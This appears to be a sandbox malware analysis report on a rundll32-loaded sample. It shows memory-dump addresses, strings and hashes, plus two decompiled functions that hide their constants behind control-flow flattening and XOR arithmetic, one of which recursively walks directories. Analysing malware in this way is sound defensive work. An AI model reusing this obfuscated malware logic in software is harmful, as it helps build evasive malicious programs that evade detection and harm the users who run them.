0x0021196f
0x00000000
0x00211975
0x00211975
0x00000000
0x00211975
0x0021196f
0x00211967
0x00000000
0x00211963
0x002119fc
0x00211a01
0x00211a04
0x00211a09
0x00211a09
0x00211a16
0x00211a1e

Strings

5E, xrefs: 0021180D
(d, xrefs: 002118FB
uL, xrefs: 00211832
"y 2, xrefs: 00211847
~Y, xrefs: 00211877
x*", xrefs: 00211A04
x*", xrefs: 00211A09
"], xrefs: 002117C3
SQ, xrefs: 0021192D
rH, xrefs: 002118D1

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "]$"y 2$(d$5E$SQ$rH$uL$x*"$x*"$~Y
API String ID: 0-656425227
Opcode ID: e7280d44e7a884410bcaec10a4673638d73f0fd9bd229187a27b5946fca426a3
Instruction ID: e08c291335dd8ca733d8405b9786ee28612d170cd27e096ca625df49570019f4
Opcode Fuzzy Hash: e7280d44e7a884410bcaec10a4673638d73f0fd9bd229187a27b5946fca426a3
Instruction Fuzzy Hash: AA6131711083429FD354CF60C89982FBBE1BBD5788F104A1DF69696260D3B5CA59CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00212B16, Relevance: 11.6, Strings: 9, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E00212B16(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
				char _v520;
				char _v1040;
				short _v1584;
				short _v1586;
				char _v1588;
				signed int _v1632;
				signed int _v1636;
				unsigned int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				unsigned int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				void* __edx;
				void* _t314;
				signed int _t340;
				signed int _t342;
				signed int _t346;
				void* _t348;
				void* _t354;
				signed int _t358;
				void* _t360;
				void* _t389;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				void* _t408;
				void* _t409;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0020602B(_t314);
				_v1672 = 0x92f4;
				_t409 = _t408 + 0x1c;
				_t354 = 0x3181563a;
				_t400 = 0x5d;
				_v1672 = _v1672 / _t400;
				_v1672 = _v1672 ^ 0xa72c55b3;
				_v1672 = _v1672 ^ 0xa72c5437;
				_v1736 = 0x461f;
				_v1736 = _v1736 + 0xd353;
				_v1736 = _v1736 + 0xffff7400;
				_v1736 = _v1736 + 0xffff12e8;
				_v1736 = _v1736 ^ 0xffffeb08;
				_v1684 = 0x12ca;
				_v1684 = _v1684 + 0xffffbd30;
				_v1684 = _v1684 + 0xc084;
				_v1684 = _v1684 ^ 0x00009b25;
				_v1700 = 0x68fe;
				_v1700 = _v1700 >> 0x10;
				_v1700 = _v1700 >> 0xf;
				_v1700 = _v1700 ^ 0x000058ac;
				_v1676 = 0xc4c1;
				_v1676 = _v1676 + 0x377e;
				_v1676 = _v1676 + 0xffff6b29;
				_v1676 = _v1676 ^ 0x0000377c;
				_v1708 = 0x7055;
				_v1708 = _v1708 << 0xe;
				_v1708 = _v1708 ^ 0x1eb23ae3;
				_v1708 = _v1708 ^ 0x02a72f08;
				_v1648 = 0x750a;
				_v1648 = _v1648 | 0xec573941;
				_v1648 = _v1648 ^ 0xec5707ed;
				_v1744 = 0xfcbf;
				_t401 = 0x2c;
				_v1744 = _v1744 * 0x3d;
				_v1744 = _v1744 >> 0xd;
				_v1744 = _v1744 / _t401;
				_v1744 = _v1744 ^ 0x00003058;
				_v1636 = 0x9933;
				_v1636 = _v1636 << 3;
				_v1636 = _v1636 ^ 0x0004b1ef;
				_v1668 = 0xb76d;
				_v1668 = _v1668 | 0xef4f757f;
				_v1668 = _v1668 ^ 0xef4ff671;
				_v1656 = 0xf145;
				_v1656 = _v1656 + 0x1194;
				_v1656 = _v1656 ^ 0x00010bb0;
				_v1752 = 0xf3e9;
				_t402 = 0x49;
				_v1752 = _v1752 / _t402;
				_v1752 = _v1752 + 0x9c03;
				_v1752 = _v1752 + 0xffffb211;
				_v1752 = _v1752 ^ 0x000027fb;
				_v1728 = 0x648a;
				_v1728 = _v1728 ^ 0x1010be16;
				_v1728 = _v1728 * 0x14;
				_v1728 = _v1728 | 0x258edfa9;
				_v1728 = _v1728 ^ 0x65dfe7b9;
				_v1688 = 0x4eab;
				_v1688 = _v1688 << 0xa;
				_v1688 = _v1688 | 0x3ca08384;
				_v1688 = _v1688 ^ 0x3dba9eb2;
				_v1756 = 0xd2f4;
				_t403 = 0x23;
				_v1756 = _v1756 / _t403;
				_v1756 = _v1756 ^ 0xcde225b2;
				_t404 = 0x6e;
				_v1756 = _v1756 / _t404;
				_v1756 = _v1756 ^ 0x01df76bd;
				_v1760 = 0x6cd1;
				_v1760 = _v1760 * 0x7d;
				_v1760 = _v1760 ^ 0x8e200a23;
				_v1760 = _v1760 >> 3;
				_v1760 = _v1760 ^ 0x11c2d811;
				_v1640 = 0xac3a;
				_v1640 = _v1640 >> 3;
				_v1640 = _v1640 ^ 0x00004856;
				_v1748 = 0x4fc2;
				_v1748 = _v1748 >> 0xf;
				_v1748 = _v1748 * 0x31;
				_v1748 = _v1748 ^ 0x38a83a44;
				_v1748 = _v1748 ^ 0x38a82be9;
				_v1680 = 0xb86a;
				_v1680 = _v1680 | 0x02231922;
				_v1680 = _v1680 + 0xaf06;
				_v1680 = _v1680 ^ 0x022411a2;
				_v1644 = 0x3f39;
				_v1644 = _v1644 + 0xffff5bb9;
				_v1644 = _v1644 ^ 0xffffc632;
				_v1692 = 0xc5f9;
				_v1692 = _v1692 ^ 0xaafe79bc;
				_v1692 = _v1692 >> 0xf;
				_v1692 = _v1692 ^ 0x00013e0d;
				_v1740 = 0x58ed;
				_v1740 = _v1740 + 0xffff3fce;
				_v1740 = _v1740 * 0x34;
				_v1740 = _v1740 * 0x49;
				_v1740 = _v1740 ^ 0xfa04971a;
				_v1696 = 0xcc7a;
				_v1696 = _v1696 >> 4;
				_v1696 = _v1696 << 1;
				_v1696 = _v1696 ^ 0x00000d26;
				_v1732 = 0xc33a;
				_v1732 = _v1732 | 0xb66c57ae;
				_v1732 = _v1732 >> 5;
				_v1732 = _v1732 * 0x56;
				_v1732 = _v1732 ^ 0xea449beb;
				_v1712 = 0xdae0;
				_v1712 = _v1712 >> 0xc;
				_v1712 = _v1712 ^ 0xc13d67df;
				_v1712 = _v1712 ^ 0xc13d455b;
				_v1716 = 0x5478;
				_v1716 = _v1716 | 0xa382055d;
				_v1716 = _v1716 * 0x26;
				_v1716 = _v1716 ^ 0x4558c259;
				_v1720 = 0xeafc;
				_v1720 = _v1720 + 0xffff5250;
				_v1720 = _v1720 ^ 0x4a0f2ed9;
				_v1720 = _v1720 ^ 0x4a0f1f8c;
				_v1664 = 0x8e28;
				_v1664 = _v1664 ^ 0x7b061f8d;
				_v1664 = _v1664 + 0xffffa0ec;
				_v1664 = _v1664 ^ 0x7b062de0;
				_v1724 = 0xce31;
				_v1724 = _v1724 << 0xe;
				_v1724 = _v1724 << 7;
				_v1724 = _v1724 << 5;
				_v1724 = _v1724 ^ 0xc4004273;
				_v1704 = 0xa554;
				_v1704 = _v1704 << 5;
				_v1704 = _v1704 * 0x35;
				_v1704 = _v1704 ^ 0x04475614;
				_v1660 = 0xb9dc;
				_v1660 = _v1660 + 0x9e03;
				_v1660 = _v1660 ^ 0x00011a8b;
				_v1652 = 0xf227;
				_t399 = _v1660;
				_v1652 = _v1652 / _t404;
				_v1652 = _v1652 ^ 0x00007d1f;
				while(1) {
					L1:
					_t389 = 0x2e;
					L2:
					while(_t354 != 0x2ecc014) {
						if(_t354 == 0xf8b22d1) {
							__eflags = _v1632 & _v1672;
							if(__eflags == 0) {
								_t340 = _a8( &_v1632, _a20);
								asm("sbb ecx, ecx");
								_t358 =  ~_t340 & 0x1c386f3a;
								L13:
								_t354 = _t358 + 0x2ecc014;
								while(1) {
									L1:
									_t389 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v1588 - _t389;
							if(_v1588 != _t389) {
								L20:
								__eflags = _a16;
								if(__eflags != 0) {
									_push(_v1760);
									_t348 = E0021889D(0x21c0b0, _v1756, __eflags);
									_pop(_t360);
									E0020C680( &_v1588, _v1748, _v1680, _t360, _v1644, _a4, _t348,  &_v520);
									E00212B16(_v1692,  &_v520, _a8, _v1696, _a16, _a20);
									_t409 = _t409 + 0x30;
									_t346 = E00212025(_v1732, _t348, _v1712, _v1716);
									_t389 = 0x2e;
								}
								L19:
								_t354 = 0x1f252f4e;
								continue;
							}
							__eflags = _v1586;
							if(__eflags == 0) {
								goto L19;
							}
							__eflags = _v1586 - _t389;
							if(_v1586 != _t389) {
								goto L20;
							}
							__eflags = _v1584;
							if(__eflags != 0) {
								goto L20;
							}
							goto L19;
						}
						if(_t354 == 0x1f252f4e) {
							_t342 = E0020595A(_v1720, _t399,  &_v1632, _v1664);
							asm("sbb ecx, ecx");
							_t358 =  ~_t342 & 0x0c9e62bd;
							__eflags = _t358;
							goto L13;
						}
						if(_t354 == 0x21983c19) {
							_push(_v1684);
							E00217BAF(__eflags,  &_v1040, _v1676, _a4, _v1708, _v1648, E0021889D(0x21c090, _v1736, __eflags));
							_t346 = E00212025(_v1744, _t343, _v1636, _v1668);
							_t409 = _t409 + 0x20;
							_t354 = 0x3298743a;
							while(1) {
								L1:
								_t389 = 0x2e;
								goto L2;
							}
						}
						if(_t354 == 0x3181563a) {
							_t354 = 0x21983c19;
							continue;
						}
						if(_t354 != 0x3298743a) {
							L24:
							__eflags = _t354 - 0x2a8aa181;
							if(__eflags != 0) {
								continue;
							}
							L25:
							return _t346;
						}
						_t346 = E0020109C(_v1656,  &_v1040,  &_v1632, _v1752, _v1728, _v1688);
						_t399 = _t346;
						_t409 = _t409 + 0x10;
						if(_t346 == 0xffffffff) {
							goto L25;
						}
						_t354 = 0xf8b22d1;
						goto L1;
					}
					E00201B5C(_v1724, _v1704, _v1660, _t399, _v1652);
					_t409 = _t409 + 0xc;
					_t354 = 0x2a8aa181;
					_t389 = 0x2e;
					goto L24;
				}
			}

0x00212b1f
0x00212b26
0x00212b2d
0x00212b34
0x00212b3b
0x00212b43
0x00212b44
0x00212b49
0x00212b54
0x00212b5d
0x00212b64
0x00212b69
0x00212b6f
0x00212b77
0x00212b7f
0x00212b87
0x00212b8f
0x00212b97
0x00212b9f
0x00212ba7
0x00212baf
0x00212bb7
0x00212bbf
0x00212bc7
0x00212bcf
0x00212bd4
0x00212bd9
0x00212be1
0x00212be9
0x00212bf1
0x00212bf9
0x00212c01
0x00212c09
0x00212c0e
0x00212c16
0x00212c1e
0x00212c29
0x00212c34
0x00212c3f
0x00212c4c
0x00212c4f
0x00212c53
0x00212c60
0x00212c64
0x00212c6c
0x00212c77
0x00212c7f
0x00212c8a
0x00212c92
0x00212c9a
0x00212ca2
0x00212caa
0x00212cb2
0x00212cba
0x00212cc6
0x00212cc9
0x00212ccd
0x00212cd5
0x00212cdd
0x00212ce5
0x00212ced
0x00212cfa
0x00212cfe
0x00212d06
0x00212d10
0x00212d18
0x00212d1d
0x00212d25
0x00212d2d
0x00212d3b
0x00212d40
0x00212d46
0x00212d52
0x00212d55
0x00212d59
0x00212d61
0x00212d6e
0x00212d72
0x00212d7a
0x00212d7f
0x00212d87
0x00212d92
0x00212d9a
0x00212da5
0x00212dad
0x00212db7
0x00212dbb
0x00212dc3
0x00212dcb
0x00212dd3
0x00212ddb
0x00212de3
0x00212deb
0x00212df6
0x00212e01
0x00212e0c
0x00212e14
0x00212e1c
0x00212e21
0x00212e29
0x00212e31
0x00212e3e
0x00212e47
0x00212e4b
0x00212e53
0x00212e5b
0x00212e60
0x00212e64
0x00212e6c
0x00212e74
0x00212e7c
0x00212e86
0x00212e8a
0x00212e92
0x00212e9a
0x00212e9f
0x00212ea7
0x00212eaf
0x00212eb7
0x00212ec4
0x00212ec8
0x00212ed0
0x00212ed8
0x00212ee0
0x00212ee8
0x00212ef0
0x00212ef8
0x00212f00
0x00212f08
0x00212f10
0x00212f18
0x00212f1f
0x00212f29
0x00212f2e
0x00212f36
0x00212f3e
0x00212f48
0x00212f4c
0x00212f54
0x00212f5c
0x00212f64
0x00212f6c
0x00212f7a
0x00212f7e
0x00212f82
0x00212f8a
0x00212f8a
0x00212f8c
0x00000000
0x00212f8d
0x00212f9f
0x002130a3
0x002130aa
0x00213193
0x0021319e
0x002131a0
0x00213094
0x00213094
0x00212f8a
0x00212f8a
0x00212f8c
0x00000000
0x00212f8c
0x00212f8a
0x002130b0
0x002130b8
0x002130e1
0x002130e1
0x002130e9
0x002130eb
0x002130f8
0x002130fd
0x0021312e
0x0021315f
0x00213164
0x00213175
0x0021317e
0x0021317e
0x002130da
0x002130da
0x00000000
0x002130da
0x002130ba
0x002130c3
0x00000000
0x00000000
0x002130c5
0x002130cd
0x00000000
0x00000000
0x002130cf
0x002130d8
0x00000000
0x00000000
0x00000000
0x002130d8
0x00212fa7
0x00213081
0x0021308c
0x0021308e
0x0021308e
0x00000000
0x0021308e
0x00212fb3
0x0021300c
0x00213044
0x0021305d
0x00213062
0x00213065
0x00212f8a
0x00212f8a
0x00212f8c
0x00000000
0x00212f8c
0x00212f8a
0x00212fbb
0x00213005
0x00000000
0x00213005
0x00212fc3
0x002131cc
0x002131cc
0x002131d2
0x00000000
0x00000000
0x002131e1
0x002131e1
0x002131e1
0x00212feb
0x00212ff0
0x00212ff2
0x00212ff8
0x00000000
0x00000000
0x00212ffe
0x00000000
0x00212ffe
0x002131bc
0x002131c1
0x002131c4
0x002131cb
0x00000000
0x002131cb

Strings

A9W, xrefs: 00212C29
xT, xrefs: 00212EAF
X, xrefs: 00212E29
VH, xrefs: 00212D9A
Up, xrefs: 00212C01
sB, xrefs: 00212F2E
&, xrefs: 00212E64
|7, xrefs: 00212BF9
9?, xrefs: 00212DEB

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &$9?$A9W$Up$VH$sB$xT$|7$X
API String ID: 0-983689062
Opcode ID: c90f0e76681419244549211c98bdce2dbf8513371b46269548e1246624706a95
Instruction ID: 9fb044d2e8824e67cbe74c5a336054102a96b85979509a5aa719f96d31e2c335
Opcode Fuzzy Hash: c90f0e76681419244549211c98bdce2dbf8513371b46269548e1246624706a95
Instruction Fuzzy Hash: F4F123715183819FD368CF61C54969FBBE1FBD4308F108A1DF29A862A0D7B58999CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002088E5, Relevance: 11.5, Strings: 9, Instructions: 298
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E002088E5(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _t325;
				short* _t331;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				short _t373;
				void* _t376;
				intOrPtr* _t380;
				void* _t382;

				 *(_t382 + 8) = 0xaa86;
				 *(_t382 + 8) =  *(_t382 + 8) + 0xffffe070;
				 *(_t382 + 8) =  *(_t382 + 8) << 0xc;
				 *(_t382 + 8) =  *(_t382 + 8) << 6;
				 *(_t382 + 8) =  *(_t382 + 8) ^ 0x2bd80002;
				 *(_t382 + 0x64) = 0xdd5d;
				 *(_t382 + 0x64) =  *(_t382 + 0x64) ^ 0x3d690a55;
				 *(_t382 + 0x64) =  *(_t382 + 0x64) ^ 0x3d69d718;
				 *(_t382 + 0x74) = 0x57af;
				_t380 = __edx;
				 *((intOrPtr*)(_t382 + 0x9c)) = __ecx;
				_t373 = 0;
				_t340 = 5;
				 *(_t382 + 0x88) =  *(_t382 + 0x74) / _t340;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) ^ 0x40001189;
				_t376 = 0x1f5a6ea2;
				 *(_t382 + 0x68) = 0xf929;
				 *(_t382 + 0x68) =  *(_t382 + 0x68) ^ 0xb70a9a6f;
				 *(_t382 + 0x68) =  *(_t382 + 0x68) ^ 0xb70a6fd1;
				 *(_t382 + 0x74) = 0x8254;
				 *(_t382 + 0x74) =  *(_t382 + 0x74) << 2;
				 *(_t382 + 0x74) =  *(_t382 + 0x74) ^ 0x00022a5c;
				 *(_t382 + 0x48) = 0x274c;
				_t341 = 0x4c;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) * 0x48;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x4b411b57;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x4b4a2351;
				 *(_t382 + 0x7c) = 0x6684;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) + 0xaed9;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) ^ 0x00014ccf;
				 *(_t382 + 0x40) = 0x1902;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0x72d0747c;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) / _t341;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0x01828d69;
				 *(_t382 + 0x6c) = 0xb89b;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) + 0xffffd32a;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) ^ 0x0000fcd5;
				 *(_t382 + 0x14) = 0x3892;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) >> 0xa;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x2d57d543;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) + 0x6cb7;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x2d585a45;
				 *(_t382 + 0x28) = 0xad3d;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) + 0xffffae8b;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) >> 2;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) << 7;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) ^ 0x000b51d9;
				 *(_t382 + 0x58) = 0xde2;
				_t342 = 0x39;
				 *(_t382 + 0x54) =  *(_t382 + 0x58) * 0x34;
				 *(_t382 + 0x54) =  *(_t382 + 0x54) / _t342;
				 *(_t382 + 0x54) =  *(_t382 + 0x54) ^ 0x00000d30;
				 *(_t382 + 0x1c) = 0xba82;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) << 4;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) >> 0xc;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) ^ 0xd59b4b7c;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) ^ 0xd59b12fd;
				 *(_t382 + 0x40) = 0xa3d9;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0xd82378ca;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) + 0xffff3c17;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0xd8236a86;
				 *(_t382 + 0x5c) = 0xecab;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) >> 0x10;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) ^ 0x7d98124e;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) ^ 0x7d9832d2;
				 *(_t382 + 0x80) = 0x1387;
				_t343 = 0x2a;
				 *(_t382 + 0x80) =  *(_t382 + 0x80) * 0x63;
				 *(_t382 + 0x80) =  *(_t382 + 0x80) ^ 0x0007c428;
				 *(_t382 + 0x4c) = 0x7ada;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) * 0x39;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) + 0xffffefa5;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) ^ 0x001b3452;
				 *(_t382 + 0x90) = 0x1591;
				 *(_t382 + 0x90) =  *(_t382 + 0x90) >> 8;
				 *(_t382 + 0x90) =  *(_t382 + 0x90) ^ 0x0000431e;
				 *(_t382 + 0x2c) = 0x3f89;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) << 5;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) | 0xff33b819;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) << 7;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) ^ 0x9bfcb078;
				 *(_t382 + 0x98) = 0x7441;
				 *(_t382 + 0x98) =  *(_t382 + 0x98) / _t343;
				 *(_t382 + 0x98) =  *(_t382 + 0x98) ^ 0x000035d7;
				 *(_t382 + 0x48) = 0x7f1e;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) + 0x7f31;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) << 0xe;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x3f939bef;
				 *(_t382 + 0x8c) = 0x831c;
				 *(_t382 + 0x8c) =  *(_t382 + 0x8c) << 8;
				 *(_t382 + 0x8c) =  *(_t382 + 0x8c) ^ 0x008363dd;
				 *(_t382 + 0x30) = 0x92b6;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) + 0xa4c2;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) << 0xc;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) << 8;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) ^ 0x77802bdf;
				 *(_t382 + 0x28) = 0x1d89;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) | 0xf9709c7c;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) * 0x25;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) | 0x703957df;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) ^ 0x7d7fbb45;
				 *(_t382 + 0x58) = 0x126d;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) >> 3;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) >> 9;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) ^ 0x000002d5;
				 *(_t382 + 0x7c) = 0x1a69;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) | 0x10216cf6;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) ^ 0x102141be;
				 *(_t382 + 0x20) = 0xff0b;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) >> 0x10;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) << 7;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) * 0x21;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) ^ 0x000040df;
				 *(_t382 + 0x6c) = 0xe12c;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) + 0x79cf;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) ^ 0x000152eb;
				 *(_t382 + 0x34) = 0xd574;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) | 0x9559dde1;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) ^ 0x4f646285;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) + 0xffff68ed;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) ^ 0xda3d1e7a;
				 *(_t382 + 0x88) = 0x5832;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) * 0x27;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) ^ 0x000d0611;
				 *(_t382 + 0x50) = 0x55a1;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) << 0xf;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) ^ 0x45d5d069;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) ^ 0x6f0533ce;
				 *(_t382 + 0x14) = 0xc073;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) + 0xffffd37e;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) << 3;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) << 4;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x0049a7c7;
				 *(_t382 + 0x94) = 0xf1be;
				_t337 =  *((intOrPtr*)(_t382 + 0xa0));
				_t344 = 0xa;
				 *(_t382 + 0x94) =  *(_t382 + 0x94) / _t344;
				 *(_t382 + 0x94) =  *(_t382 + 0x94) ^ 0x00002403;
				 *(_t382 + 0x60) = 0x96ef;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) + 0xfa48;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) | 0xbd3809b4;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) ^ 0xbd39967f;
				 *(_t382 + 0x38) = 0xec0c;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) + 0x6908;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) * 0x26;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) >> 9;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) ^ 0x00001f14;
				do {
					while(_t376 != 0x3ac0a14) {
						if(_t376 == 0x7fec1df) {
							_t344 = _t382 + 0x2ac;
							E00210D33(_t382 + 0x2ac,  *(_t382 + 0x48), __eflags,  *((intOrPtr*)(_t382 + 0x70)),  *(_t382 + 0x14),  *((intOrPtr*)(_t382 + 0x24)));
							_t382 = _t382 + 0xc;
							_t376 = 0x12c07630;
							continue;
						} else {
							if(_t376 == 0x12c07630) {
								_push( *(_t382 + 0x1c));
								E002029E3(_t382 + 0x2b0, 0x104, E0021889D( *((intOrPtr*)(_t382 + 0x4b8)),  *(_t382 + 0x58), __eflags),  *(_t382 + 0x5c),  *(_t382 + 0x74),  *(_t382 + 0x94),  *((intOrPtr*)(_t382 + 0xac)),  *((intOrPtr*)(_t382 + 0x4c4)),  *(_t382 + 0x54),  *(_t382 + 0x94));
								_t344 =  *(_t382 + 0x5c);
								E00212025( *(_t382 + 0x5c), _t327,  *((intOrPtr*)(_t382 + 0xc4)),  *((intOrPtr*)(_t382 + 0x70)));
								_t382 = _t382 + 0x30;
								_t376 = 0x3ac0a14;
								continue;
							} else {
								if(_t376 == 0x1f5a6ea2) {
									_t376 = 0x2b635c32;
									continue;
								} else {
									if(_t376 == 0x2b635c32) {
										E00213E3F(_t344, _t382 + 0xa4, __eflags,  *(_t382 + 0x68),  *((intOrPtr*)(_t382 + 0x70)));
										_t331 = E002028CE(_t382 + 0xac,  *(_t382 + 0x50),  *(_t382 + 0x80));
										_t382 = _t382 + 0xc;
										_t376 = 0x7fec1df;
										_t344 = 0;
										 *_t331 = 0;
										continue;
									} else {
										if(_t376 == 0x2c9ad714) {
											E00214F7D( *(_t382 + 0x60),  *(_t382 + 0x38), _t337);
										} else {
											if(_t376 != 0x33ecfade) {
												goto L16;
											} else {
												_t263 = _t380 + 4; // 0xedb0bf04
												E00216CAA( *(_t382 + 0x4c),  *((intOrPtr*)(_t382 + 0xa0)), _t337, _t263,  *(_t382 + 0x64),  *_t380,  *(_t382 + 0x20), _t344,  *_t263,  *(_t382 + 0x94));
												_t382 = _t382 + 0x20;
												_t344 = 1;
												_t376 = 0x2c9ad714;
												_t373 =  !=  ? 1 : _t373;
												continue;
											}
										}
									}
								}
							}
						}
						L19:
						return _t373;
					}
					_t325 = E0020B566(_t344, 0,  *((intOrPtr*)(_t382 + 0xb8)),  *(_t382 + 0x58),  *((intOrPtr*)(_t382 + 0xa8)),  *(_t382 + 0x48), _t344,  *((intOrPtr*)(_t382 + 0x70)),  *(_t382 + 0x90),  *((intOrPtr*)(_t382 + 0x84)),  *(_t382 + 0x2c),  *(_t382 + 0x74),  *(_t382 + 0x1c),  *((intOrPtr*)(_t382 + 0x4b8)));
					_t337 = _t325;
					_t382 = _t382 + 0x30;
					__eflags = _t325 - 0xffffffff;
					if(__eflags == 0) {
						_t376 = 0x18af80d5;
						goto L16;
					} else {
						_t376 = 0x33ecfade;
						continue;
					}
					goto L19;
					L16:
					__eflags = _t376 - 0x18af80d5;
				} while (__eflags != 0);
				goto L19;
			}

0x002088eb
0x002088f3
0x002088fb
0x00208900
0x00208905
0x0020890d
0x00208915
0x0020891d
0x00208925
0x00208935
0x00208937
0x00208942
0x00208944
0x00208949
0x00208952
0x0020895d
0x00208962
0x0020896a
0x00208972
0x0020897a
0x00208982
0x00208987
0x0020898f
0x0020899c
0x0020899f
0x002089a3
0x002089ab
0x002089b3
0x002089bb
0x002089c3
0x002089cb
0x002089d3
0x002089e3
0x002089e7
0x002089ef
0x002089f7
0x002089ff
0x00208a07
0x00208a0f
0x00208a14
0x00208a1c
0x00208a24
0x00208a2c
0x00208a34
0x00208a3c
0x00208a41
0x00208a46
0x00208a4e
0x00208a5b
0x00208a5c
0x00208a66
0x00208a6a
0x00208a72
0x00208a7a
0x00208a7f
0x00208a84
0x00208a8c
0x00208a94
0x00208a9c
0x00208aa4
0x00208aac
0x00208ab4
0x00208abc
0x00208ac1
0x00208acb
0x00208ad3
0x00208ae8
0x00208ae9
0x00208af0
0x00208afb
0x00208b08
0x00208b0c
0x00208b14
0x00208b1c
0x00208b27
0x00208b2f
